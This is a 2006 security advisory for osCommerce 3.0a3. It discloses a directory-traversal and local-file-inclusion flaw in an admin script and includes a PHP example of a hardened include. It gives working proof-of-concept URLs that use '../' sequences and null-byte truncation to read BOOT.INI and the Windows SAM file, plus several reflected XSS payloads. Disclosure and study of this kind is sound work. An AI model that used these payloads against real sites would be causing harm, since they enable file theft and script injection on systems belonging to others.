osc303.txt

2006-12-07T00:00:00
ID PACKETSTORM:52835
Type packetstorm
Reporter Lostmon
Modified 2006-12-07T00:00:00

Description

                                        
                                            `############################################  
Oscommerce traversal arbitrary file access  
Vendor: http://www.oscommerce.com/about/news,125  
Advisory: http://lostmon.blogspot.com/2006/12/oscommerce-traversal-arbitrary-file.html  
Vendor notified: NO    Exploit available: YES  
###########################################  
  
osCommerce contains a flaw that allows remote traversal and  
arbitrary file access. The flaw exists because the application  
does not validate the filter variable upon submission to the  
admin/templates_boxes_layout.php script. This could allow a  
remote authenticated administrator to create a specially  
crafted URL containing '../' directory traversal sequences  
to view files on the target system with the privileges of  
the web server process.  
  
  
  
####################  
versions  
####################  
  
Oscommerce 3.0a3  
  
  
###################  
SOLUTION  
###################  
  
No solution was available at this time.  
  
  
################  
timeline  
################  
  
Discovered: 11-11-2006  
Vendor notified: -----  
Vendor response: ----  
Disclosure: 07-12-2006  
  
#################  
Examples  
#################  
  
######################  
traversal file access  
######################  
  
When we try to open  
  
http://localhost/oscommerce/admin/templates_boxes_layout.php?  
set=boxes&filter=[SOME WORD]&lID=27  
  
the application discloses the full installation path and  
returns this error:  
  
Warning: require(includes/templates/[SOME WORD].php) [function.require]:  
failed to open stream: No such file or directory in C:\AppServ\www\  
oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13  
  
Fatal error: require() [function.require]: Failed opening required  
'includes/templates/[SOME WORD].php' (include_path='.;C:\php5\pear')  
in C:\AppServ\www\oscommerce\admin\templates\pages\templates_  
boxes_layout.php on line 13  
  
The application appends the .php extension to our [SOME WORD]  
and searches for that file in a folder inside the web server root.  
We can therefore include any PHP file located on the web server  
through the application, and it is executed (local file inclusion):  
  
http://[victim]/admin/templates_boxes_layout.php?  
set=boxes&filter=../../our_evil_php_file&lID=27  
  
If we try to read a file outside the web server folder, or one  
without a .php extension, we can test with this:  
  
&filter=../../../../file.extension%00  
  
For example, to look for boot.ini on a Windows system:  
  
http://localhost/oscommerce/admin/templates_boxes_layout.php?  
set=boxes&filter=../../../../BOOT.INI%00&lID=27  
  
http://localhost/oscommerce/admin/templates_boxes_layout.php?  
set=content&filter=../../../../windows/repair/sam%00&lID=27  
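  
The include pattern implied by the error message above, beside a hardened form, as an added example (not osCommerce's own code): the vulnerable line is reconstructed from the error text, and the template directory path, the identifier allow-list and the resolve_template() helper are assumptions.  
  
```php
<?php
// Vulnerable pattern, reconstructed from the advisory's error message
// (assumption, not osCommerce source):
//   require('includes/templates/' . $_GET['filter'] . '.php');
// "../" walks out of the template directory, and on PHP 5 a %00 in the
// value truncates the path so the appended ".php" is never applied.

/**
 * Resolve a template name to a file inside $baseDir, or return null.
 * An allow-list keeps "../", "/" and NUL bytes from ever reaching the
 * filesystem; a realpath containment check is the second line of defence.
 */
function resolve_template(string $name, string $baseDir): ?string
{
    // Template names are plain identifiers; \z rejects a trailing newline too.
    if (!preg_match('/^[A-Za-z0-9_]{1,64}\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $candidate = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $candidate === false) {
        return null;
    }
    // The resolved file must sit strictly under the template directory.
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Hypothetical layout: templates live beside this script (assumption).
$templateDir = __DIR__ . '/includes/templates';
$filter = $_GET['filter'] ?? 'boxes';
$file = resolve_template($filter, $templateDir);
if ($file === null) {
    // A generic error: do not echo the rejected value or the server path,
    // which is what turned the original failure into path disclosure.
    http_response_code(400);
    exit('Invalid template name.');
}
require $file;
```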
  
#####################  
Cross site scripting  
#####################  
  
http://localhost/oscommerce/admin/modules.php?set=shipping  
%22%3E%3Cscript%3Ealert('xss')%3C/script%3E  
  
http://localhost/definitiva/admin/customers.php?selected_box=customers  
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E  
  
http://localhost/oscommerce/admin/languages_definitions.php?lID=1  
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E  
  
http://localhost/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT  
%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product  
  
  
######################## End #####################  
  
Thanks to Estrella for being my light.  
  
--   
Sincerely:  
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
--  
Curiosity is what makes the mind move....  